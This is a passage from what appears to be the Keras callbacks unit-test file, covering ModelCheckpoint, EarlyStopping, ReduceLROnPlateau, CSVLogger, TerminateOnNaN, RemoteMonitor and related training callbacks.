monitor=monitor, save_best_only=save_best_only, save_weights_only=True, mode=mode, options=tf.train.CheckpointOptions()) keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, save_weights_only=False, mode=mode, options=tf.saved_model.SaveOptions()) # Case 11: `ModelCheckpoint` save model with batch number in filename. filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}batch{batch:02d}.h5') cbks = [ keras.callbacks.ModelCheckpoint(filepath, monitor=monitor, save_freq=1) ] assert not os.path.exists(filepath.format(epoch=1, batch=1)) assert not os.path.exists(filepath.format(epoch=1, batch=2)) assert not os.path.exists(filepath.format(epoch=2, batch=1)) assert not os.path.exists(filepath.format(epoch=2, batch=2)) assert not os.path.exists(filepath.format(epoch=3, batch=1)) assert not os.path.exists(filepath.format(epoch=3, batch=2)) assert not os.path.exists(filepath.format(epoch=4, batch=1)) assert not os.path.exists(filepath.format(epoch=4, batch=2)) assert not os.path.exists(filepath.format(epoch=5, batch=1)) assert not os.path.exists(filepath.format(epoch=5, batch=2)) model.fit( x_train, y_train, batch_size=5, validation_data=(x_test, y_test), callbacks=cbks, epochs=5, verbose=1) assert os.path.exists(filepath.format(epoch=1, batch=1)) assert os.path.exists(filepath.format(epoch=1, batch=2)) assert os.path.exists(filepath.format(epoch=2, batch=1)) assert os.path.exists(filepath.format(epoch=2, batch=2)) assert os.path.exists(filepath.format(epoch=3, batch=1)) assert os.path.exists(filepath.format(epoch=3, batch=2)) assert os.path.exists(filepath.format(epoch=4, batch=1)) assert os.path.exists(filepath.format(epoch=4, batch=2)) assert os.path.exists(filepath.format(epoch=5, batch=1)) assert os.path.exists(filepath.format(epoch=5, batch=2)) os.remove(filepath.format(epoch=1, batch=1)) os.remove(filepath.format(epoch=1, batch=2)) os.remove(filepath.format(epoch=2, batch=1)) os.remove(filepath.format(epoch=2, batch=2)) os.remove(filepath.format(epoch=3, batch=1)) os.remove(filepath.format(epoch=3, batch=2)) os.remove(filepath.format(epoch=4, batch=1)) os.remove(filepath.format(epoch=4, batch=2)) os.remove(filepath.format(epoch=5, batch=1)) os.remove(filepath.format(epoch=5, batch=2)) # Case 12: ModelCheckpoint saves model with initial_value_threshold param mode = 'max' monitor = 'val_acc' initial_value_threshold = 0 save_best_only = True filepath = os.path.join(temp_dir, 'checkpoint.h5') cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, initial_value_threshold=initial_value_threshold, mode=mode) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) assert os.path.exists(filepath) os.remove(filepath) # Case 13: ModelCheckpoint saves model with initial_value_threshold param mode = 'auto' monitor = 'val_loss' initial_value_threshold = None save_best_only = True cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, initial_value_threshold=initial_value_threshold, mode=mode) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) assert os.path.exists(filepath) os.remove(filepath) # Case 14: ModelCheckpoint doesnt save model if loss was minimum earlier mode = 'min' monitor = 'val_loss' initial_value_threshold = 0 save_best_only = True cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, initial_value_threshold=initial_value_threshold, mode=mode) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) assert not os.path.exists(filepath) # Case 15: ModelCheckpoint doesnt save model if loss was min earlier in auto # mode mode = 'auto' monitor = 'val_loss' initial_value_threshold = 0 save_best_only = True cbks = [ keras.callbacks.ModelCheckpoint( filepath, monitor=monitor, save_best_only=save_best_only, initial_value_threshold=initial_value_threshold, mode=mode) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) assert not os.path.exists(filepath) @test_utils.run_v2_only def test_ModelCheckpoint_subclass_save_weights_false(self): model = test_utils.get_small_subclass_mlp(NUM_HIDDEN, NUM_CLASSES) model.compile( loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc']) temp_dir = self.get_temp_dir() self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True) filepath = os.path.join(temp_dir, 'checkpoint') cbks = [keras.callbacks.ModelCheckpoint( filepath, save_weights_only=False)] (x_train, y_train), _ = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_train = np_utils.to_categorical(y_train, num_classes=NUM_CLASSES) model.fit( x_train, y_train, callbacks=cbks, epochs=1, verbose=0) # Check that the filepath is a SavedModel directory. self.assertIn('saved_model.pb', os.listdir(filepath)) def _get_dummy_resource_for_model_checkpoint_testing(self): def get_input_datasets(): # Simple training input. train_input = [[1.]] * 16 train_label = [[0.]] * 16 ds = tf.data.Dataset.from_tensor_slices((train_input, train_label)) return ds.batch(8, drop_remainder=True) # Very simple bias model to eliminate randomness. optimizer = gradient_descent.SGD(0.1) model = sequential.Sequential() model.add(test_utils.Bias(input_shape=(1,))) model.compile(loss='mae', optimizer=optimizer, metrics=['mae']) train_ds = get_input_datasets() temp_dir = self.get_temp_dir() filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5') # The filepath shouldn't exist at the beginning. self.assertFalse(os.path.exists(filepath)) callback = keras.callbacks.ModelCheckpoint( filepath=filepath, save_weights_only=True) return model, train_ds, callback, filepath def _run_load_weights_on_restart_test_common_iterations(self): (model, train_ds, callback, filepath) = self._get_dummy_resource_for_model_checkpoint_testing() initial_epochs = 3 model.fit(train_ds, epochs=initial_epochs, callbacks=[callback]) # The files should exist after fitting with callback. for epoch in range(initial_epochs): self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1))) self.assertFalse(os.path.exists(filepath.format(epoch=initial_epochs + 1))) self.assertEqual( callback._get_most_recently_modified_file_matching_pattern(filepath), filepath.format(epoch=initial_epochs)) model.fit(train_ds, epochs=1) weights_after_one_more_epoch = model.get_weights() # The filepath should continue to exist after fitting without callback. for epoch in range(initial_epochs): self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1))) return model, train_ds, filepath, weights_after_one_more_epoch @staticmethod def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only): def func(self): (model, train_ds, filepath, weights_after_one_more_epoch ) = self._run_load_weights_on_restart_test_common_iterations() # Sleep for some short time period ensuring the files are created with # a different time (in MacOS OSS the granularity is only 1 second). time.sleep(2) callback = keras.callbacks.ModelCheckpoint( filepath=filepath, save_weights_only=save_weights_only, load_weights_on_restart=True) model.fit(train_ds, epochs=1, callbacks=[callback]) weights_after_model_restoring_and_one_more_epoch = model.get_weights() self.assertEqual( callback._get_most_recently_modified_file_matching_pattern(filepath), filepath.format(epoch=1)) model.fit( train_ds, epochs=1, callbacks=[ keras.callbacks.ModelCheckpoint( filepath=filepath, save_weights_only=save_weights_only, load_weights_on_restart=True) ]) weights_with_one_final_extra_epoch = model.get_weights() # Asserting the weights one epoch after initial fitting and another epoch # after that are closed, if a ModelCheckpoint with # load_weights_on_restart=True is given (so the model is restored at the # beginning of training). self.assertAllClose(weights_after_one_more_epoch, weights_after_model_restoring_and_one_more_epoch) self.assertNotAllClose(weights_after_one_more_epoch, weights_with_one_final_extra_epoch) return func @staticmethod def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only): def func(self): (model, train_ds, filepath, weights_after_one_more_epoch ) = self._run_load_weights_on_restart_test_common_iterations() model.fit( train_ds, epochs=1, callbacks=[ keras.callbacks.ModelCheckpoint( filepath=filepath, save_weights_only=save_weights_only) ]) weights_after_model_restoring_and_one_more_epoch = model.get_weights() # Asserting the weights one epoch after initial fitting and another epoch # after that are different, if a ModelCheckpoint with # load_weights_on_restart=False is given (so the model is not restored at # the beginning of training). self.assertNotAllClose(weights_after_one_more_epoch, weights_after_model_restoring_and_one_more_epoch) return func test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \ get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True) test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \ get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False) test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \ get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True) test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \ = get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False) def test_ModelCheckpoint_override_if_file_exist(self): (model, train_ds, filepath, _) = self._run_load_weights_on_restart_test_common_iterations() # Sleep for some short time period to ensure the files are created with # a different time (in MacOS OSS the granularity is only 1 second). time.sleep(2) callback = keras.callbacks.ModelCheckpoint( filepath=filepath, save_weights_only=True) model.load_weights( callback._get_most_recently_modified_file_matching_pattern(filepath)) weights_before_additional_fit = model.get_weights() model.fit(train_ds, epochs=1, callbacks=[callback]) model.load_weights( callback._get_most_recently_modified_file_matching_pattern(filepath)) weights_after_additional_fit = model.get_weights() self.assertNotAllClose(weights_before_additional_fit, weights_after_additional_fit) def test_fit_with_ModelCheckpoint_with_tf_config(self): (model, train_ds, callback, _) = self._get_dummy_resource_for_model_checkpoint_testing() os.environ['TF_CONFIG'] = json.dumps({ 'cluster': { 'worker': ['localhost:23333'] }, 'task': { 'type': 'worker', 'index': 0 } }) # `model.fit()` should work regardless of the presence of `TF_CONFIG`. model.fit(train_ds, epochs=1, callbacks=[callback]) def test_fit_with_ModelCheckpoint_with_dir_as_h5_filepath(self): (model, train_ds, callback, filepath) = self._get_dummy_resource_for_model_checkpoint_testing() temp_dir = self.get_temp_dir() filepath = os.path.join(temp_dir, 'temp.h5') self.assertFalse(os.path.exists(filepath)) os.mkdir(filepath) self.assertTrue(os.path.exists(filepath)) callback = keras.callbacks.ModelCheckpoint(filepath=filepath) with self.assertRaisesRegex( IOError, 'Please specify a non-directory ' 'filepath for ModelCheckpoint.'): model.fit(train_ds, epochs=1, callbacks=[callback]) def test_ModelCheckpoint_with_bad_path_placeholders(self): (model, train_ds, callback, filepath) = self._get_dummy_resource_for_model_checkpoint_testing() temp_dir = self.get_temp_dir() filepath = os.path.join(temp_dir, 'chkpt_{epoch:02d}_{mape:.2f}.h5') callback = keras.callbacks.ModelCheckpoint(filepath=filepath) with self.assertRaisesRegex(KeyError, 'Failed to format this callback ' 'filepath.*'): model.fit(train_ds, epochs=1, callbacks=[callback]) def test_ModelCheckpoint_nonblocking(self): filepath = self.get_temp_dir() # Should only cause a sync block when saving is actually performed. callback = keras.callbacks.ModelCheckpoint(filepath=filepath, save_freq=100) self.assertTrue(callback._supports_tf_logs) model = keras.Sequential([keras.layers.Dense(1)]) cb_list = keras.callbacks.CallbackList([callback], model=model, epochs=1, steps=10, verbose=0) tensor = tf.convert_to_tensor(1.) def mock_numpy(): raise RuntimeError( 'If this error is seen, ModelCheckpoint is causing a blocking ' 'NumPy conversion even when not checkpointing.') tensor.numpy = mock_numpy logs = {'metric': tensor} cb_list.on_train_begin(logs) cb_list.on_epoch_begin(0, logs) cb_list.on_train_batch_begin(0, logs) cb_list.on_train_batch_end(0, logs) cb_list.on_epoch_end(0, logs) cb_list.on_train_end(logs) cb_list.on_test_begin(logs) cb_list.on_test_batch_begin(0, logs) cb_list.on_test_batch_end(0, logs) cb_list.on_test_end(logs) cb_list.on_predict_begin(logs) cb_list.on_predict_batch_begin(logs) cb_list.on_predict_batch_end(logs) cb_list.on_predict_end(logs) def test_verbose_2_logging(self): data = np.random.random((100, 1)) labels = np.where(data > 0.5, 1, 0) model = keras.models.Sequential((keras.layers.Dense( 1, input_dim=1, activation='relu'), keras.layers.Dense( 1, activation='sigmoid'),)) model.compile( optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy']) expected_log = r'(.*- loss:.*- acc.*:.*epoch)+' with self.captureWritesToStream(sys.stdout) as printed: model.fit(data, labels, verbose=2, epochs=20) self.assertRegex(printed.contents(), expected_log) def test_ProgbarLogger_verbose_2_nonblocking(self): # Should only cause a sync block on epoch end methods. callback = keras.callbacks.ProgbarLogger(count_mode='steps') self.assertTrue(callback._supports_tf_logs) model = keras.Sequential([keras.layers.Dense(1)]) cb_list = keras.callbacks.CallbackList([callback], model=model, epochs=1, steps=10, verbose=2) tensor = tf.convert_to_tensor(1.) def mock_numpy(): raise RuntimeError( 'If this error is seen, ModelCheckpoint is causing a blocking ' 'NumPy conversion even when not checkpointing.') tensor.numpy = mock_numpy logs = {'metric': tensor} cb_list.on_train_begin(logs) cb_list.on_epoch_begin(0, logs) cb_list.on_train_batch_begin(0, logs) cb_list.on_train_batch_end(0, logs) cb_list.on_test_begin(logs) cb_list.on_test_batch_begin(0, logs) cb_list.on_test_batch_end(0, logs) cb_list.on_test_end(logs) with self.assertRaisesRegex(RuntimeError, 'NumPy conversion'): # on_epoch_end should still block. cb_list.on_epoch_end(0, logs) cb_list.on_train_end(logs) def test_EarlyStopping(self): with self.cached_session(): np.random.seed(123) (x_train, y_train), (x_test, y_test) = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = test_utils.get_small_sequential_mlp( num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM) model.compile( loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc']) cases = [ ('max', 'val_acc'), ('min', 'val_loss'), ('auto', 'val_acc'), ('auto', 'loss'), ('unknown', 'unknown') ] for mode, monitor in cases: patience = 0 cbks = [ keras.callbacks.EarlyStopping( patience=patience, monitor=monitor, mode=mode) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=5, verbose=0) def test_EarlyStopping_reuse(self): with self.cached_session(): np.random.seed(1337) patience = 3 data = np.random.random((100, 1)) labels = np.where(data > 0.5, 1, 0) model = keras.models.Sequential((keras.layers.Dense( 1, input_dim=1, activation='relu'), keras.layers.Dense( 1, activation='sigmoid'),)) model.compile( optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy']) weights = model.get_weights() # This should allow training to go for at least `patience` epochs model.set_weights(weights) stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience) hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20) assert len(hist.epoch) >= patience def test_EarlyStopping_with_baseline(self): with self.cached_session(): np.random.seed(1337) baseline = 0.6 (data, labels), _ = test_utils.get_test_data( train_samples=100, test_samples=50, input_shape=(1,), num_classes=NUM_CLASSES) model = test_utils.get_small_sequential_mlp( num_hidden=1, num_classes=1, input_dim=1) model.compile( optimizer='sgd', loss='binary_crossentropy', metrics=['acc']) stopper = keras.callbacks.EarlyStopping(monitor='acc', baseline=baseline) hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20) assert len(hist.epoch) == 2 patience = 3 stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience, baseline=baseline) hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20) assert len(hist.epoch) >= patience def test_EarlyStopping_final_weights_when_restoring_model_weights(self): class DummyModel: def __init__(self): self.stop_training = False self.weights = -1 def get_weights(self): return self.weights def set_weights(self, weights): self.weights = weights def set_weight_to_epoch(self, epoch): self.weights = epoch early_stop = keras.callbacks.EarlyStopping(monitor='val_loss', patience=2, restore_best_weights=True) early_stop.model = DummyModel() losses = [0.2, 0.15, 0.1, 0.11, 0.12] # The best configuration is in the epoch 2 (loss = 0.1000). epochs_trained = 0 early_stop.on_train_begin() for epoch in range(len(losses)): epochs_trained += 1 early_stop.model.set_weight_to_epoch(epoch=epoch) early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]}) if early_stop.model.stop_training: break # The best configuration is in epoch 2 (loss = 0.1000), # and while patience = 2, we're restoring the best weights, # so we end up at the epoch with the best weights, i.e. epoch 2 self.assertEqual(early_stop.model.get_weights(), 2) # Check early stopping when no model beats the baseline. early_stop = keras.callbacks.EarlyStopping( monitor='val_loss', patience=5, baseline=0.5, restore_best_weights=True) early_stop.model = DummyModel() losses = [0.9, 0.8, 0.7, 0.71, 0.72, 0.73] # The best configuration is in the epoch 2 (loss = 0.7000). epochs_trained = 0 early_stop.on_train_begin() for epoch in range(len(losses)): epochs_trained += 1 early_stop.model.set_weight_to_epoch(epoch=epoch) early_stop.on_epoch_end(epoch, logs={'val_loss': losses[epoch]}) if early_stop.model.stop_training: break # No epoch improves on the baseline, so we should train for only 5 epochs, # and restore the second model. self.assertEqual(epochs_trained, 5) self.assertEqual(early_stop.model.get_weights(), 2) def test_RemoteMonitor(self): if requests is None: self.skipTest('`requests` required to run this test') return None monitor = keras.callbacks.RemoteMonitor() # This will raise a warning since the default address in unreachable: monitor.on_epoch_end(0, logs={'loss': 0.}) def test_LearningRateScheduler(self): with self.cached_session(): np.random.seed(1337) (x_train, y_train), (x_test, y_test) = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = test_utils.get_small_sequential_mlp( num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM) model.compile( loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) cbks = [ keras.callbacks.LearningRateScheduler( lambda x: 1. / (1. + x), verbose=1) ] io_utils.enable_interactive_logging() with self.captureWritesToStream(sys.stdout) as printed: model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=5) self.assertIn('LearningRateScheduler setting learning rate to 1.0', printed.contents()) assert ( float(keras.backend.get_value( model.optimizer.lr)) - 0.2) < keras.backend.epsilon() cbks = [keras.callbacks.LearningRateScheduler(lambda x, lr: lr / 2)] model.compile( loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=2, verbose=0) assert ( float(keras.backend.get_value( model.optimizer.lr)) - 0.01 / 4) < keras.backend.epsilon() cbks = [ keras.callbacks.LearningRateScheduler( lambda epoch, _: learning_rate_schedule.CosineDecay(0.01, 2) (epoch)) ] model.compile( loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=2, verbose=0) cosine_decay_np = 0.5 * (1 + np.cos(np.pi * (1 / 2))) decayed_learning_rate = 0.01 * cosine_decay_np assert (float(keras.backend.get_value(model.optimizer.lr)) - decayed_learning_rate) < keras.backend.epsilon() def test_ReduceLROnPlateau(self): with self.cached_session(): np.random.seed(1337) (x_train, y_train), (x_test, y_test) = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def make_model(): tf.compat.v1.set_random_seed(1234) np.random.seed(1337) model = test_utils.get_small_sequential_mlp( num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM) model.compile( loss='categorical_crossentropy', optimizer=gradient_descent.SGD(lr=0.1)) return model # TODO(psv): Make sure the callback works correctly when min_delta is # set as 0. Test fails when the order of this callback and assertion is # interchanged. model = make_model() cbks = [ keras.callbacks.ReduceLROnPlateau( monitor='val_loss', factor=0.1, min_delta=0, patience=1, cooldown=5) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=2, verbose=0) self.assertAllClose( float(keras.backend.get_value(model.optimizer.lr)), 0.1, atol=1e-4) model = make_model() # This should reduce the LR after the first epoch (due to high epsilon). cbks = [ keras.callbacks.ReduceLROnPlateau( monitor='val_loss', factor=0.1, min_delta=10, patience=1, cooldown=5) ] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=2, verbose=2) self.assertAllClose( float(keras.backend.get_value(model.optimizer.lr)), 0.01, atol=1e-4) def test_ReduceLROnPlateau_patience(self): class DummyOptimizer: def __init__(self): self.lr = keras.backend.variable(1.0) class DummyModel: def __init__(self): self.optimizer = DummyOptimizer() reduce_on_plateau = keras.callbacks.ReduceLROnPlateau( monitor='val_loss', patience=2) reduce_on_plateau.model = DummyModel() losses = [0.0860, 0.1096, 0.1040] lrs = [] for epoch in range(len(losses)): reduce_on_plateau.on_epoch_end(epoch, logs={'val_loss': losses[epoch]}) lrs.append(keras.backend.get_value(reduce_on_plateau.model.optimizer.lr)) # The learning rates should be 1.0 except the last one for lr in lrs[:-1]: self.assertEqual(lr, 1.0) self.assertLess(lrs[-1], 1.0) def test_ReduceLROnPlateau_backwards_compatibility(self): with tf.compat.v1.test.mock.patch.object(logging, 'warning') as mock_log: reduce_on_plateau = keras.callbacks.ReduceLROnPlateau(epsilon=1e-13) self.assertRegex( str(mock_log.call_args), '`epsilon` argument is deprecated') self.assertFalse(hasattr(reduce_on_plateau, 'epsilon')) self.assertTrue(hasattr(reduce_on_plateau, 'min_delta')) self.assertEqual(reduce_on_plateau.min_delta, 1e-13) def test_CSVLogger(self): with self.cached_session(): np.random.seed(1337) temp_dir = self.get_temp_dir() self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True) filepath = os.path.join(temp_dir, 'log.tsv') sep = '\t' (x_train, y_train), (x_test, y_test) = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) def make_model(): np.random.seed(1337) model = test_utils.get_small_sequential_mlp( num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM) model.compile( loss='categorical_crossentropy', optimizer=gradient_descent.SGD(lr=0.1), metrics=['accuracy']) return model # case 1, create new file with defined separator model = make_model() cbks = [keras.callbacks.CSVLogger(filepath, separator=sep)] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) assert os.path.exists(filepath) with open(filepath) as csvfile: dialect = csv.Sniffer().sniff(csvfile.read()) assert dialect.delimiter == sep del model del cbks # case 2, append data to existing file, skip header model = make_model() cbks = [keras.callbacks.CSVLogger(filepath, separator=sep, append=True)] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1, verbose=0) # case 3, reuse of CSVLogger object model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=2, verbose=0) with open(filepath) as csvfile: list_lines = csvfile.readlines() for line in list_lines: assert line.count(sep) == 4 assert len(list_lines) == 5 output = ' '.join(list_lines) assert len(re.findall('epoch', output)) == 1 os.remove(filepath) def test_stop_training_csv(self): # Test that using the CSVLogger callback with the TerminateOnNaN callback # does not result in invalid CSVs. np.random.seed(1337) tmpdir = self.get_temp_dir() self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True) with self.cached_session(): fp = os.path.join(tmpdir, 'test.csv') (x_train, y_train), (x_test, y_test) = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) cbks = [keras.callbacks.TerminateOnNaN(), keras.callbacks.CSVLogger(fp)] model = keras.models.Sequential() for _ in range(5): model.add(keras.layers.Dense(2, input_dim=INPUT_DIM, activation='relu')) model.add(keras.layers.Dense(NUM_CLASSES, activation='linear')) model.compile(loss='mean_squared_error', optimizer='rmsprop') def data_generator(): i = 0 max_batch_index = len(x_train) // BATCH_SIZE tot = 0 while 1: if tot > 3 * len(x_train): yield (np.ones([BATCH_SIZE, INPUT_DIM]) * np.nan, np.ones([BATCH_SIZE, NUM_CLASSES]) * np.nan) else: yield (x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE], y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]) i += 1 tot += 1 i %= max_batch_index history = model.fit_generator(data_generator(), len(x_train) // BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=20) loss = history.history['loss'] assert len(loss) > 1 assert loss[-1] == np.inf or np.isnan(loss[-1]) values = [] with open(fp) as f: # On Windows, due to \r\n line ends, we may end up reading empty lines # after each line. Skip empty lines. values = [x for x in csv.reader(f) if x] assert 'nan' in values[-1], 'The last epoch was not logged.' @test_combinations.run_all_keras_modes(always_skip_v1=True) def test_TerminateOnNaN(self): np.random.seed(1337) (x_train, y_train), (x_test, y_test) = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) cbks = [keras.callbacks.TerminateOnNaN()] model = keras.models.Sequential() initializer = keras.initializers.Constant(value=1e5) for _ in range(5): model.add( keras.layers.Dense( 2, input_dim=INPUT_DIM, activation='relu', kernel_initializer=initializer)) model.add(keras.layers.Dense(NUM_CLASSES)) model.compile(loss='mean_squared_error', optimizer='rmsprop') history = model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=20) loss = history.history['loss'] self.assertEqual(len(loss), 1) self.assertTrue(np.isnan(loss[0]) or np.isinf(loss[0])) @unittest.skipIf( os.name == 'nt', 'use_multiprocessing=True does not work on windows properly.') def test_LambdaCallback(self): with self.cached_session(): np.random.seed(1337) (x_train, y_train), (x_test, y_test) = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_test = np_utils.to_categorical(y_test) y_train = np_utils.to_categorical(y_train) model = keras.models.Sequential() model.add( keras.layers.Dense( NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu')) model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax')) model.compile( loss='categorical_crossentropy', optimizer='sgd', metrics=['accuracy']) # Start an arbitrary process that should run during model # training and be terminated after training has completed. e = threading.Event() def target(): e.wait() t = threading.Thread(target=target) t.start() cleanup_callback = keras.callbacks.LambdaCallback( on_train_end=lambda logs: e.set()) cbks = [cleanup_callback] model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=5, verbose=0) t.join() assert not t.is_alive() def test_RemoteMonitor_np_array(self): if requests is None: self.skipTest('`requests` required to run this test') with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post: monitor = keras.callbacks.RemoteMonitor(send_as_json=True) a = np.arange(1) # a 1 by 1 array logs = {'loss': 0., 'val': a} monitor.on_epoch_end(0, logs=logs) send = {'loss': 0., 'epoch': 0, 'val': 0} requests_post.assert_called_once_with( monitor.root + monitor.path, json=send, headers=monitor.headers) def test_RemoteMonitor_np_float32(self): if requests is None: self.skipTest('`requests` required to run this test') with tf.compat.v1.test.mock.patch.object(requests, 'post') as requests_post: monitor = keras.callbacks.RemoteMonitor(send_as_json=True) a = np.float32(1.0) # a float32 generic type logs = {'loss': 0., 'val': a} monitor.on_epoch_end(0, logs=logs) send = {'loss': 0., 'epoch': 0, 'val': 1.0} requests_post.assert_called_once_with( monitor.root + monitor.path, json=send, headers=monitor.headers) def test_RemoteMonitorWithJsonPayload(self): if requests is None: self.skipTest('`requests` required to run this test') return None with self.cached_session(): (x_train, y_train), (x_test, y_test) = test_utils.get_test_data( train_samples=TRAIN_SAMPLES, test_samples=TEST_SAMPLES, input_shape=(INPUT_DIM,), num_classes=NUM_CLASSES) y_test = keras.utils.np_utils.to_categorical(y_test) y_train = keras.utils.np_utils.to_categorical(y_train) model = keras.models.Sequential() model.add( keras.layers.Dense( NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu')) model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax')) model.compile( loss='categorical_crossentropy', optimizer='rmsprop', metrics=['accuracy']) cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)] with tf.compat.v1.test.mock.patch.object(requests, 'post'): model.fit( x_train, y_train, batch_size=BATCH_SIZE, validation_data=(x_test, y_test), callbacks=cbks, epochs=1) def test_progbar_infers_steps(self): x, y = np.ones((10, 1)), np.ones((10, 1)) data = tf.data.Dataset.from_tensor_slices((x, y)).batch(2) data = data.filter(lambda x, y: True) # Unknown cardinality. progbar = keras.callbacks.ProgbarLogger('steps') model = keras.Sequential([keras.layers.Dense(1)]) model.compile('sgd', 'mse') self.assertIsNone(progbar.target) model.fit(data, epochs=2, callbacks=[progbar]) self.assertEqual(progbar.target, 5) @test_combinations.run_all_keras_modes(always_skip_v1=True) def test_callback_passed_floats(self): class MyCallback(keras.callbacks.Callback): def on_batch_end(self, batch, logs=None): assert isinstance(batch, int) assert isinstance(logs['loss'], float) self.on_batch_end_called = True def on_epoch_end(self, batch, logs=None): assert isinstance(batch, int) assert isinstance(logs['loss'], float) self.on_epoch_end_called = True x, y = np.ones((10, 1)), np.ones((10, 1)) model = keras.Sequential([keras.layers.Dense(1)]) model.compile('sgd', 'mse', run_eagerly=test_utils.should_run_eagerly()) callback = MyCallback() model.fit(x, y, epochs=2, callbacks=[callback]) self.assertTrue(callback.on_batch_end_called) self.assertTrue(callback.on_batch_end_called) 